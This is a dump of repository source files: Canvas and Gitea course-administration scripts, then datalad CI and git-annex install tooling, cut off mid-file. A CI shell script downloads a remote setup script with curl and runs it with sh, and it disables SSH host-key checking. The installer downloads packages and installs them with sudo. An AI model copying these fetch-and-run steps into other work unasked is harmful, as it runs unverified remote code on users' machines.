re-assigned to: {}'.format(_reassign))\n print('==============================')\n return _score\n\n\nif __name__ == '__main__':\n utils.import_env()\n canvas_base_url = os.environ['CANVAS_BASE_URL']\n canvas_token = os.environ['CANVAS_TOKEN']\n umji_canvas = Canvas('https://umjicanvas.com', canvas_token)\n course = umji_canvas.get_course(sys.argv[2])\n assignment = course.get_assignment(sys.argv[3])\n students = {}\n\n for _student in course.get_users(enrollment_type=['student']):\n students[_student.id] = _student.sis_login_id\n\n joj_scores = {}\n csv_path = sys.argv[1] if sys.argv[1] else settings.csv_path\n with open(csv_path) as joj_csv:\n joj_score = csv.reader(joj_csv)\n skip_line = 0\n for student_row in joj_score:\n if skip_line < settings.content_row:\n skip_line += 1\n continue\n score = joj_score_to_canvas_score(student_row)\n student_id = student_row[settings.csv_sjtu_id_column]\n joj_scores[student_id] = score\n\n all_submissions = assignment.get_submissions()\n\n for _submission in all_submissions:\n if _submission.user_id in students:\n this_student_sjtu_id = students[_submission.user_id]\n this_joj_score = joj_scores.get(this_student_sjtu_id, 0)\n print('SJTU ID:{}, Score:{}'.format(\n this_student_sjtu_id, this_joj_score))\n _submission.edit(submission={'posted_grade': this_joj_score})\n" }, { "alpha_fraction": 0.6766085624694824, "alphanum_fraction": 0.7161527872085571, "avg_line_length": 27.97087287902832, "blob_id": "0ca402fe77f71f478f23927953f250fdaf9f243d", "content_id": "12d8acb2ff1618806ffda65f17017c42809f1c48", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2984, "license_type": "permissive", "max_line_length": 118, "num_lines": 103, "path": "/GradeFromJOJ/settings.py", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "\"\"\"\nCanvas fast grading script\nby makersmelx <[email protected]>\n\"\"\"\n\nfrom datetime import datetime\n\n\"\"\"\nGet them on Canvas (look at the url of the assignment, you will know the id)\n\"\"\"\n# REQUIRED FIELDS\ncourse_id = 0\n\n# REQUIRED FIELDS\nassignment_id = 0\n\"\"\"\nGet them on Canvas (look at the url of the assignment, you will know the id)\n\"\"\"\n\n\"\"\"\nCSV path. Ignore this if you have type the file path in program arguments\nNotice: all the column starts from 0\n\"\"\"\n# notice the csv should be exported from joj notice that this python script will be started in the root directory,\n# write the path of the csv file according to GiteaCanvasHelper root directory\n# REQUIRED\ncsv_path = ''\n\n\"\"\"\nthe row that records the first student's scores\nStart from 0, usually no need to change\nREQUIRED\n\"\"\"\ncontent_row = 1\n\"\"\"\nthe column that records student name\nStart from 0, usually no need to change and no use\nREQUIRED\n\"\"\"\ncsv_name_column = 1\n\n\"\"\"\nthe column that records SJTU id\nStart from 0, usually no need to change\nREQUIRED\n\"\"\"\ncsv_sjtu_id_column = 2\n\n\"\"\"\nwrite all the column index (of the csv, start from 0) of the score that you would like to include\nremember that for each column index please give them a weight in the second list\n\"\"\"\n# example: csv_score_column = [7, 8], weight = [0.1, 0.2], suppose that all data in one row is a list called row.\n# Grade for this student is ``row[7] * 0.1 + row[8] * 0.2``\ncsv_score_column = [3]\nweight = [float(100/270)]\n\n\"\"\"\nadjust to canvas score\n\"\"\"\n# This adjust is applied after calculating Canvas score from csv and before bonus/deduction\n# Modify the example below, the value should be the Canvas score\nextra_adjust = {\n \"517370910xxx\": 10,\n \"517370910xxy\": -10\n}\n\n# direct reassign point on Canvas to a student, will do this after all the add-weight calculation, bonus and deduction\ndirect_reassign = {\n \"517370910xxx\": 100,\n \"517370910xxy\": 0\n}\n\n\n\"\"\"\nBelow are some features that are nonsense now\n\"\"\"\n# \"\"\"\n# How to decide the final submission time? Suppose you will define the time of the latest submission of three\n# problems as the final submission time of this assignment, write down the column of the used time (in seconds) of\n# three problems here\n# \"\"\"\n# # Usually no need to fill this field if you are using from JOJ\n# csv_last_submission_timestamp_column = []\n\n# \"\"\"\n# Date settings\n# \"\"\"\n# # Usually no need to fill these field if you are using from JOJ\n#\n# start_date = datetime(2020, 9, 25)\n#\n# due_date = datetime(2020, 10, 11, 23, 59, 59)\n# # late deduction is multiplied to the full point of this assignment rather than the current score rather than,\n# # and then deducted from the current score\n# # late_deduction = [0.1, 0.1, 0.1] means 10% deduction per day, and 0 pt for more than three days\n# late_deduction = []\n#\n# # Bonus settings\n# has_bonus = False\n# bonus_date = datetime(2020, 10, 4, 23, 59, 59)\n# # bonus portion is multiplied to the current score rather than the full point of this assignment\n# bonus_portion = 0.1\n" }, { "alpha_fraction": 0.7166666388511658, "alphanum_fraction": 0.7166666388511658, "avg_line_length": 27.799999237060547, "blob_id": "f0c585d86311612039aa72093174fad64b915bd4", "content_id": "1be572d9f270d36117a2cfedf93bc39714fe052e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 720, "license_type": "permissive", "max_line_length": 78, "num_lines": 25, "path": "/src/axios/gitea.js", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "import axios from 'axios';\nimport dotenv from 'dotenv';\n\ndotenv.config();\nconst readlineSync = require('readline-sync');\nconst giteaToken = process.env.GITEA_TOKEN ||\n readlineSync.question('Type in your gitea token:\\n');\nconst local = process.env.CONNECTION ?\n process.env.CONNECTION.toLowerCase() === 'local' :\n false;\nconst remoteGiteaInstance = axios.create({\n baseURL: process.env.GITEA_BASE_URL,\n headers: {\n 'Authorization': `token ${giteaToken}`,\n },\n});\n\nconst localGiteaInstance = axios.create({\n baseURL: process.env.LOCAL_GITEA_URL,\n headers: {\n 'Authorization': `token ${process.env.LOCAL_GITEA_TOKEN}`,\n },\n});\n\nexport const giteaInstance = local ? localGiteaInstance : remoteGiteaInstance;\n" }, { "alpha_fraction": 0.591549277305603, "alphanum_fraction": 0.591549277305603, "avg_line_length": 28.789474487304688, "blob_id": "cdc5450f1d06c91b0aed05fe53acec409c10e598", "content_id": "30644fd37babc942582ee903560532c67af5cf58", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 568, "license_type": "permissive", "max_line_length": 75, "num_lines": 19, "path": "/src/settings/team.js", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "export const projectTeamConfig = (teamName, config = {}) => {\n return {\n 'description': config.description || teamName,\n 'includes_all_repositories': config.includes_all_repositories || false,\n 'can_create_org_repo': config.can_create_org_repo || false,\n 'name': config.name || teamName,\n 'permission': config.permission || 'write',\n 'units': config.units || [\n 'repo.code',\n 'repo.issues',\n 'repo.ext_issues',\n 'repo.wiki',\n 'repo.pulls',\n 'repo.releases',\n 'repo.projects',\n 'repo.ext_wiki'\n ]\n };\n};\n\n\n" }, { "alpha_fraction": 0.6808510422706604, "alphanum_fraction": 0.6808510422706604, "avg_line_length": 30.33333396911621, "blob_id": "feaa8b124423684202615102f44732508bf909d4", "content_id": "fca36c339c02076bef2a523729090b362be7307c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 94, "license_type": "permissive", "max_line_length": 37, "num_lines": 3, "path": "/src/courses/index.js", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "export * from './initTeams';\nexport * from './courses';\nexport * from './createEveryoneTeam';\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 29, "blob_id": "61af8c24a36fac35a64f8119ec75148768851ab6", "content_id": "9a8a8763921c4927698e05fed0e8a3a837642abe", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 60, "license_type": "permissive", "max_line_length": 35, "num_lines": 2, "path": "/src/settings/index.js", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "export * from './branchProtection';\nexport * from './team';\n" }, { "alpha_fraction": 0.6907216310501099, "alphanum_fraction": 0.6907216310501099, "avg_line_length": 31.33333396911621, "blob_id": "c3900cfc696d066b160973a5904b1e2e84df89b7", "content_id": "6650f9b6b48b1cadddcb1b2464428b90f72df4cc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 97, "license_type": "permissive", "max_line_length": 33, "num_lines": 3, "path": "/src/teams/index.js", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "export * from './addUserToTeam';\nexport * from './createTeam';\nexport * from './formatTeamName';\n" }, { "alpha_fraction": 0.5928251147270203, "alphanum_fraction": 0.6017937064170837, "avg_line_length": 25.235294342041016, "blob_id": "8095d9705eb852d6d93cb3795d7a812a69c3d91e", "content_id": "aac603e01b5222656a26058937fbb85622e454cd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2230, "license_type": "permissive", "max_line_length": 79, "num_lines": 85, "path": "/src/teams/createTeamRepo.js", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "import { giteaInstance } from '../axios';\nimport { teamRepoMasterProtection } from '../settings';\nimport { logger } from '../logger';\n\n/**\n *\n * @param organization\n * @param teamName\n * @returns {Promise<void>}\n */\nexport const createTeamRepo = async (organization, teamName) => {\n const repoName = teamName;\n\n //create repo\n const ret = await giteaInstance.post(`/orgs/${organization}/repos`, {\n 'auto_init': true,\n 'description': 'string',\n 'name': `${teamName}`,\n 'private': true,\n }).then(response => {\n switch (response.status) {\n case 409:\n logger.info(`${organization}/${repoName} already exists.`);\n return Promise.resolve(-1);\n case 422:\n logger.error(`Creating ${organization}/${repoName} fails.`);\n return Promise.resolve(-1);\n case 201:\n return Promise.resolve(1);\n default:\n return Promise.resolve(-1);\n }\n }, error => {\n return Promise.resolve(-1);\n });\n\n // if (ret === -1) {\n // return;\n // }\n\n //grant access to team\n let response = (await giteaInstance.get(`/orgs/${organization}/teams/search`,\n {\n params: {\n q: teamName,\n },\n }));\n const queryList = response.data.data;\n if (queryList.length === 0) {\n logger.error(`Team ${teamName} does not exist.`);\n return;\n }\n const teamID = queryList[0].id;\n\n await giteaInstance.put(\n `/teams/${teamID}/repos/${organization}/${repoName}`).then(response => {\n switch (response.status) {\n case 403:\n logger.error(`Grant access of ${teamName} to repo ${repoName} fails.`);\n break;\n default:\n break;\n }\n }, error => {\n logger.error(error.response);\n });\n\n // add branch protection\n await giteaInstance.post(\n `/repos/${organization}/${repoName}/branch_protections`,\n teamRepoMasterProtection(),\n ).then((response) => {\n logger.info('Add branch protection');\n }, (error) => {\n logger.error(error.response.data);\n });\n await giteaInstance.patch(\n `/repos/${organization}/${repoName}/branch_protections/master`,\n teamRepoMasterProtection(),\n ).then((response) => {\n logger.info('Update branch protection');\n }, (error) => {\n logger.error(error.response.data);\n });\n};\n" }, { "alpha_fraction": 0.6078431606292725, "alphanum_fraction": 0.6078431606292725, "avg_line_length": 24.5, "blob_id": "55d8f9b2aa459f21e335f03a1fb928cf5786b988", "content_id": "7eef608ebf228f7dd40e938b5e22b6e33322a33c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 51, "license_type": "permissive", "max_line_length": 25, "num_lines": 2, "path": "/src/axios/index.js", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "export * from './gitea';\nexport * from './canvas';\n" }, { "alpha_fraction": 0.7454800605773926, "alphanum_fraction": 0.7528523802757263, "avg_line_length": 31.741378784179688, "blob_id": "4926b7a5e773f78672ee1eb864c25e13746e0ed7", "content_id": "43b8c5d8f6e218ed215eba4874ce432b7468adba", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5697, "license_type": "permissive", "max_line_length": 229, "num_lines": 174, "path": "/README.md", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "# Gitea and Canvas helper\nThis repo contains scripts that\n- Upload students grade on Canvas based on their scores on JOJ\n- Set students ready on Gitea based on their Canvas information\n\n## Available Usage\n### Python part\n\n- [Create a personal repo for everyone in an organization](#CreatePersonalRepo)\n- [Grade Canvas from JOJ exported CSV](#GradeFromJOJ)\n\n### Node.js part\n- [Create a team in the organization which have all students of this course on Canvas page as its members.\n](#createEveryoneTeam) while Its loop version is [Loop version](#createEveryoneTeamLoop).\n- [According the group in a group set on Canvas, create relative teams on Canvas and add students to the team\n](#initTeam)\n\n## Before use\n\n1. Install Node.js on your system\n2. Go the root directory and\n~~~\nnpm install\n~~~\n\n## .env Setting\n\n~~~shell\nGITEA_BASE_URL=https://focs.ji.sjtu.edu.cn/git/api/v1/\nCANVAS_BASE_URL=https://umjicanvas.com/api/v1/\nGITEA_TOKEN=\nCANVAS_TOKEN=\n# for local Gitea instance (not essential, can run without them)\nCONNECTION=local\nLOCAL_GITEA_URL=http://localhost:3000/api/v1/\nLOCAL_GITEA_TOKEN=\n~~~\nExample is at example/.env.example. Make a copy of it to the root dir. Rename it to .env\n\nIf you have not set the environment variable, you will be asked to input the missing variable through CLI at the start of the program.\n\n(Only for testing local Gitea): If you would like to test your local Gitea instance, otherwise please ignore. Define CONNECTION and Set CONNECTION to 'local', so that the program will connect to local server (see axios/gitea.js) \n\n## Course Setting (Before running)\n\nSee `example/courses.json.example`. Make a copy of it to the root dir. Rename it to `courses.json`\n\n**Please update the course name, or the id of the course on Canvas.**\n\nFor the usage below, when you need to type in a course name, please **use the course name rather than the actually id here**\n\n## Org and Team in Gitea\nIn Gitea, you cannot add a user to an organization directly. Instead, you should invite the user to at least one team in this organization, to add the user to the organization.\n\n## Node.js part\nRun `npm install` before everything (skip it for Python usage)\nBasic usage will all be like:\n~~~\nnpm start <usage> arg1 arg2 ... \n~~~\n\n\n\n\n### initTeam\n\nAccording the group in a group set on Canvas, create relative teams on Canvas and add students to the team\n\n**Notice: when group set name is `pgroup2`, this function will go through all the groups from all the group sets with name `pgroup2 {id}` rather than all the groups in the group set `pgroup2` on Canvas**\n\n**Warning: If a student are not added into a group in this group set on Canvas, for coding convenience, I will nothing about this student here. Please check him manually.**\n\n\n~~~\nnpm start i <course name> <Gitea org name> <groupset name>\n~~~\n\nlike\n\n~~~\nnpm start i ve482 ve482-org pgroup2\n~~~\n\n\n\n### CreateEveryoneTeam\n\nCreate a team in the organization which have all students of this course on Canvas page as its members.\n\nNotice that this function will only add students who have registered on Gitea. If they are to be taught how to register on the lab, you can try loop version so that it can run itself.\n~~~\nnpm start s <course name> <Gitea org name> <team name>\n~~~\n\nlike\n\n~~~\nnpm start s ve482 ve482-org Students\n~~~\n\n\n### CreateEveryoneTeamLoop(under maintainance)\n\nLoop version of CreateEveryoneTeam. Create a team in the organization which have all students of this course on Canvas page as its members.\n. Repeat this every <interval> ms.\n\n~~~\nnpm start labLoop <course name> <team name> <interval>\n~~~\n\nlike\n\n~~~\nnpm start labLoop ve482 Students 30000\n~~~\n\n\n### To loop in the lab (to be fixed)\nIt will in a loop run createEveryoneTeam and Create a personal repo for everyone in an organization\n\nI don't know what I am writing now......\n\n`It will be fixed if I remember this and that time I am bored.`\n~~~shell\n./loop.sh\n~~~\n\n\n## Python Part\n### CreatePersonalRepo\nCreate a personal repo for everyone in an organization.\n\nNotice that it only works when the working dir is this `GiteaCanvasHelper` root directory.\n\nOn Gitea, every student will have his own personal repository with name `${his_name}${sjtu_id}`\n\nThis Python program shares the same environment variable with Node.js in .env\n\nMake sure the first arg is in the course.json\n~~~shell\npython CreatePersonalRepo/CreatePersonalRepo.py [course name] [organization name]\n~~~\n\n### GradeFromJOJ\n**!!!: This feature has been moved to a separated repo now at [auto-csv-grader](https://github.com/makersmelx/canvas-csv-autograder). It is not going to be updated here anymore**\n \n \nGrade Canvas from JOJ exported CSV.\n\nSee `GradeFromJOJ` folder \n\nNotice that it only works when the working dir is this `GiteaCanvasHelper` root directory.\n\nIt is used to upload grades on Canvas based on JOJ 1.0 score. \n\n1. Set `CANVAS_TOKEN` at .env in `GiteaCanvasHelper` root directory\n2. <del>Modify all the settings in `settings.py`</del>\n3. You must set a default grade for this assignment for each student before running this script\n\nYou can also use this script to upload scores on Canvas based on your own csv file (you should include students' sjtu id. OR if your csv have the same first three columns as JOJ 1.0 csv format)\n\n~~~shell script\npython GradeFromJOJ/GradeFromJOJ.py [csv_path] [course_id] [assignment_id] [canvas_full_score] [joj_full_score]\n~~~\n\ncsv_path is the path of the JOJ exported grade csv file\n\ncourse_id: appeared in Canvas course page url, id of the course\n\ncourse_id: appeared in Canvas assignment page url, id of the assignment\n\ncanvas_full_score: full score of this assignment on canvas\n\njoj_full_score: full score of this assignment on joj\n" }, { "alpha_fraction": 0.5142857432365417, "alphanum_fraction": 0.522857129573822, "avg_line_length": 19.58823585510254, "blob_id": "567873c42673890d5c944e10f12754b439fbe16c", "content_id": "f23057a09466d349b3a7d0a7a4009277442d1ab7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 350, "license_type": "permissive", "max_line_length": 59, "num_lines": 17, "path": "/GradeFromJOJ/utils.py", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "\"\"\"\nCanvas fast grading script\nby makersmelx <[email protected]>\n\"\"\"\n\nimport os\n\ndotenv_path = '.env'\n\n\ndef import_env():\n with open(dotenv_path) as dotenv:\n for line in dotenv:\n var = line.strip().split('=')\n if len(var) == 2:\n key, value = var[0].strip(), var[1].strip()\n os.environ[key] = value\n" }, { "alpha_fraction": 0.7021870613098145, "alphanum_fraction": 0.7068403959274292, "avg_line_length": 41.939998626708984, "blob_id": "233d1e8709ad77616e8b6b9c4585cd3dfbb6d103", "content_id": "2c6144c81b123b8b37bdaaa8c4d1a6dc8dc2a5c6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2149, "license_type": "permissive", "max_line_length": 172, "num_lines": 50, "path": "/src/index.js", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "import { createEveryoneTeam, initTeams, } from './courses';\nimport { logger } from './logger';\n\nconst readlineSync = require('readline-sync');\n\nconst callInitTeams = async (courseName, organization, groupSetName) => {\n const failList = await initTeams(\n courseName.toLowerCase(), organization, groupSetName\n );\n logger.warn(\n 'If a student are not added into a group in this group set on Canvas, for coding convenience, I will do nothing about this student here. Please check him manually.\\n');\n logger.info(\n 'Notice that the below students are not adding to a expected Gitea Team.\\n');\n logger.info(failList);\n};\n\nconst callCreateStudentTeam = async (courseName, organization, teamName) => {\n const failList = await createEveryoneTeam(\n courseName.toLowerCase(), organization, teamName\n );\n logger.info(\n 'Notice that the below students are not adding to the expected Gitea Student Team.\\n');\n logger.info(failList);\n};\nconst argv = process.argv.slice(3);\nlet organization, groupSetName, teamName, mode, courseName;\nmode = process.argv[2] || readlineSync.question(\n 'Please choose a mode.\\n [s] Create a team that includes all students of this course.\\n [i] Create teams according the group set name on canvas.\\n> ');\nswitch (mode) {\n case 's':\n courseName = argv[0] || readlineSync.question('Type in the course name:\\n');\n organization = argv[1] ||\n readlineSync.question('Type in the organization name:\\n');\n teamName = argv[2] || readlineSync.question(\n 'Type in the overall team name, like Students:\\n');\n callCreateStudentTeam(courseName, organization, teamName);\n break;\n case 'i':\n courseName = argv[0] || readlineSync.question('Type in the course name:\\n');\n organization = argv[1] ||\n readlineSync.question('Type in the organization name:\\n');\n groupSetName = argv[2] || readlineSync.question(\n 'Type in the group set name, like pgroup (if one group is named as pgroup-01):\\n');\n callInitTeams(courseName, organization, groupSetName);\n break;\n case 'h':\n default:\n console.log('Unrecognized arguments. For usage guidance, see README.md');\n break;\n}\n\n\n" } ]
19
djarecka/datalad
https://github.com/djarecka/datalad
92ca5619b957e0cc2fe7021c0f0542127eee4e8d
2f8ec83b44108d3b022c778a99d648105028f202
bf53a532810d49eb35809f079f46c78de9a406f7
refs/heads/master
2021-08-18T02:51:53.091271
2021-01-09T09:33:40
2021-01-09T09:33:40
241,991,640
0
0
NOASSERTION
2020-02-20T21:16:50
2020-02-20T19:33:32
2020-02-20T20:14:36
null
[ { "alpha_fraction": 0.6818727254867554, "alphanum_fraction": 0.7106842994689941, "avg_line_length": 17.93181800842285, "blob_id": "9addabf69ac05dbf98eba9122f4a43a6e8ff0a61", "content_id": "bf5e0f65196fd0060328bf921d38d4ede32e99b7", "detected_licenses": [ "MIT", "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 833, "license_type": "permissive", "max_line_length": 86, "num_lines": 44, "path": "/tools/ci/prep-travis-forssh.sh", "repo_name": "djarecka/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\nset -eu\n\nmkdir -p \"$HOME/.ssh\"\n\ncat >>\"$HOME/.ssh/config\" <<'EOF'\n\nHost datalad-test\nHostName localhost\nPort 42241\nUser dl\nStrictHostKeyChecking no\nIdentityFile /tmp/dl-test-ssh-id\nEOF\n\ncat >>\"$HOME/.ssh/config\" <<'EOF'\n\nHost datalad-test2\nHostName localhost\nPort 42242\nUser dl\nStrictHostKeyChecking no\nIdentityFile /tmp/dl-test-ssh-id\nEOF\n\nls -l \"$HOME/.ssh\"\nchmod go-rwx -R \"$HOME/.ssh\"\nls -ld \"$HOME/.ssh\"\nls -l \"$HOME/.ssh\"\n\nssh-keygen -f /tmp/dl-test-ssh-id -N \"\"\n\ncurl -fSsL \\\n https://raw.githubusercontent.com/datalad-tester/docker-ssh-target/master/setup \\\n >setup-docker-ssh\nsh setup-docker-ssh --key=/tmp/dl-test-ssh-id.pub -2 \\\n --from=dataladtester/docker-ssh-target:latest\n\nuntil nc -vz localhost 42241 && nc -vz localhost 42242\ndo sleep 1\ndone\n\nssh -v datalad-test exit\nssh -v datalad-test2 exit\n" }, { "alpha_fraction": 0.5749207735061646, "alphanum_fraction": 0.5769085884094238, "avg_line_length": 38.185264587402344, "blob_id": "5c249ccdc23158b288f169d8ec2b0a65fdc22b72", "content_id": "9bced015bb4970d79fe6e9aee5fb2e8bbd5d47cd", "detected_licenses": [ "MIT", "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18613, "license_type": "permissive", "max_line_length": 99, "num_lines": 475, "path": "/datalad/install.py", "repo_name": "djarecka/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n__python_requires__ = \"~= 3.6\"\nimport argparse\nimport json\nimport logging\nimport os\nimport os.path\nfrom pathlib import Path\nimport platform\nfrom shlex import quote\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\nfrom urllib.request import Request, urlopen\nfrom zipfile import ZipFile\n\nlog = logging.getLogger(\"datalad.install\")\n\n\ndef main():\n logging.basicConfig(\n format=\"%(asctime)s [%(levelname)-8s] %(name)s %(message)s\",\n datefmt=\"%Y-%m-%dT%H:%M:%S%z\",\n level=logging.INFO,\n )\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--adjust-bashrc\",\n action=\"store_true\",\n help=\"If the scheme tweaks PATH, prepend a snippet to ~/.bashrc that exports that path.\",\n )\n parser.add_argument(\n \"-E\",\n \"--env-write-file\",\n help=\"Write modified environment variables to this file\",\n )\n schemata = parser.add_subparsers(\n title=\"schema\",\n dest=\"schema\",\n description='Type of git-annex installation (default \"conda-forge\")',\n )\n schemata.add_parser(\"autobuild\", help=\"Linux, macOS only\")\n schemata.add_parser(\"brew\", help=\"macOS only\")\n scm_conda_forge = schemata.add_parser(\"conda-forge\", help=\"Linux, macOS only\")\n scm_conda_forge.add_argument(\"-b\", \"--batch\", action=\"store_true\")\n scm_conda_forge.add_argument(\"--path-miniconda\")\n scm_conda_forge.add_argument(\"version\", nargs=\"?\")\n scm_conda_forge_last = schemata.add_parser(\n \"conda-forge-last\", help=\"Linux, macOS only\"\n )\n scm_conda_forge_last.add_argument(\"-b\", \"--batch\", action=\"store_true\")\n scm_conda_forge_last.add_argument(\"--path-miniconda\")\n scm_conda_forge_last.add_argument(\"version\", nargs=\"?\")\n schemata.add_parser(\"datalad-git-annex-build\", help=\"Linux, macOS only\")\n scm_deb_url = schemata.add_parser(\"deb-url\", help=\"Linux only\")\n scm_deb_url.add_argument(\"url\")\n schemata.add_parser(\"neurodebian\", help=\"Linux only\")\n schemata.add_parser(\"neurodebian-devel\", help=\"Linux only\")\n schemata.add_parser(\"snapshot\", help=\"Linux, macOS only\")\n scm_miniconda = schemata.add_parser(\n \"miniconda\", help=\"Install just Miniconda; Linux, macOS only\"\n )\n scm_miniconda.add_argument(\"-b\", \"--batch\", action=\"store_true\")\n scm_miniconda.add_argument(\"--path-miniconda\")\n scm_datalad = schemata.add_parser(\n \"datalad\", help=\"Install Datalad via Miniconda; Linux, macOS only\"\n )\n scm_datalad.add_argument(\"-b\", \"--batch\", action=\"store_true\")\n scm_datalad.add_argument(\"--path-miniconda\")\n args = parser.parse_args()\n if args.env_write_file is not None:\n with open(args.env_write_file, \"w\"):\n # Force file to exist and start out empty\n pass\n installer = GitAnnexInstaller(\n adjust_bashrc=args.adjust_bashrc, env_write_file=args.env_write_file,\n )\n if args.schema is None:\n installer.install_via_conda_forge()\n elif args.schema == \"autobuild\":\n installer.install_via_autobuild()\n elif args.schema == \"brew\":\n installer.install_via_brew()\n elif args.schema == \"conda-forge\":\n installer.install_via_conda_forge(\n args.version, miniconda_path=args.path_miniconda, batch=args.batch\n )\n elif args.schema == \"conda-forge-last\":\n installer.install_via_conda_forge_last(\n args.version, miniconda_path=args.path_miniconda, batch=args.batch\n )\n elif args.schema == \"datalad-git-annex-build\":\n installer.install_via_datalad_git_annex_build()\n elif args.schema == \"deb-url\":\n installer.install_via_deb_url(args.url)\n elif args.schema == \"neurodebian\":\n installer.install_via_neurodebian()\n elif args.schema == \"neurodebian-devel\":\n installer.install_via_neurodebian_devel()\n elif args.schema == \"snapshot\":\n installer.install_via_snapshot()\n elif args.schema == \"miniconda\":\n miniconda_path = args.path_miniconda\n if miniconda_path is None:\n miniconda_path = os.path.join(tempfile.mkdtemp(prefix=\"ga-\"), \"miniconda\")\n installer.install_miniconda(miniconda_path, batch=args.batch)\n elif args.schema == \"datalad\":\n miniconda_path = args.path_miniconda\n if miniconda_path is None:\n miniconda_path = os.path.join(tempfile.mkdtemp(prefix=\"ga-\"), \"miniconda\")\n installer.install_datalad(miniconda_path, batch=args.batch)\n else:\n raise RuntimeError(f\"Invalid schema: {args.schema}\")\n\n\nclass GitAnnexInstaller:\n def __init__(self, adjust_bashrc=False, env_write_file=None):\n self.pathline = None\n self.annex_bin = \"/usr/bin\"\n self.adjust_bashrc = adjust_bashrc\n if env_write_file is None:\n self.env_write_file = None\n else:\n self.env_write_file = Path(env_write_file)\n\n def addpath(self, p, last=False):\n if self.pathline is not None:\n raise RuntimeError(\"addpath() called more than once\")\n if not last:\n newpath = f'{quote(p)}:\"$PATH\"'\n else:\n newpath = f'\"$PATH\":{quote(p)}'\n self.pathline = f\"export PATH={newpath}\"\n if self.env_write_file is not None:\n with self.env_write_file.open(\"a\") as fp:\n print(self.pathline, file=fp)\n\n def install_via_neurodebian(self):\n # TODO: use nd_freeze_install for an arbitrary version specified\n # we assume neurodebian is generally configured\n subprocess.run(\n [\"sudo\", \"apt-get\", \"install\", \"git-annex-standalone\"], check=True,\n )\n self.post_install()\n\n def install_via_neurodebian_devel(self):\n # if debian-devel is not setup -- set it up\n r = subprocess.run(\n [\"apt-cache\", \"policy\", \"git-annex-standalone\"],\n stdout=subprocess.PIPE,\n universal_newlines=True,\n check=True,\n )\n if \"/debian-devel \" not in r.stdout:\n # configure\n with open(\"/etc/apt/sources.list.d/neurodebian.sources.list\") as fp:\n srclist = fp.read()\n srclist = srclist.replace(\"/debian \", \"/debian-devel \")\n subprocess.run(\n [\n \"sudo\",\n \"tee\",\n \"/etc/apt/sources.list.d/neurodebian-devel.sources.list\",\n ],\n input=srclist,\n universal_newlines=True,\n check=True,\n )\n subprocess.run([\"sudo\", \"apt-get\", \"update\"], check=True)\n # check versions\n # devel:\n r = subprocess.run(\n [\"apt-cache\", \"policy\", \"git-annex-standalone\"],\n stdout=subprocess.PIPE,\n universal_newlines=True,\n check=True,\n )\n policy = r.stdout\n devel_annex_version = None\n current_annex_version = None\n prev = None\n for line in policy.splitlines():\n if \"/debian-devel \" in line:\n assert prev is not None\n if \"ndall\" in prev:\n assert devel_annex_version is None\n devel_annex_version = prev.split()[0]\n if \"***\" in line:\n assert current_annex_version is None\n current_annex_version = line.split()[1]\n prev = line\n assert devel_annex_version is not None, \"Could not find devel annex version\"\n if current_annex_version is None or (\n subprocess.run(\n [\n \"dpkg\",\n \"--compare-versions\",\n devel_annex_version,\n \"gt\",\n current_annex_version,\n ]\n ).returncode\n == 0\n ):\n subprocess.run(\n [\n \"sudo\",\n \"apt-get\",\n \"install\",\n f\"git-annex-standalone={devel_annex_version}\",\n ],\n check=True,\n )\n else:\n log.info(\n \"devel version %s is not newer than installed %s\",\n devel_annex_version,\n current_annex_version,\n )\n self.post_install()\n\n def install_via_deb_url(self, url):\n with tempfile.TemporaryDirectory() as tmpdir:\n debpath = os.path.join(tmpdir, \"git-annex.deb\")\n download_file(url, debpath)\n subprocess.run([\"sudo\", \"dpkg\", \"-i\", debpath], check=True)\n self.post_install()\n\n def install_via_autobuild(self):\n systype = platform.system()\n if systype == \"Linux\":\n self._install_via_autobuild_or_snapshot_linux(\"autobuild/amd64\")\n elif systype == \"Darwin\":\n self._install_via_autobuild_or_snapshot_macos(\n \"autobuild/x86_64-apple-yosemite\"\n )\n else:\n raise RuntimeError(f\"E: Unsupported OS: {systype}\")\n\n def install_via_snapshot(self):\n systype = platform.system()\n if systype == \"Linux\":\n self._install_via_autobuild_or_snapshot_linux(\"linux/current\")\n elif systype == \"Darwin\":\n 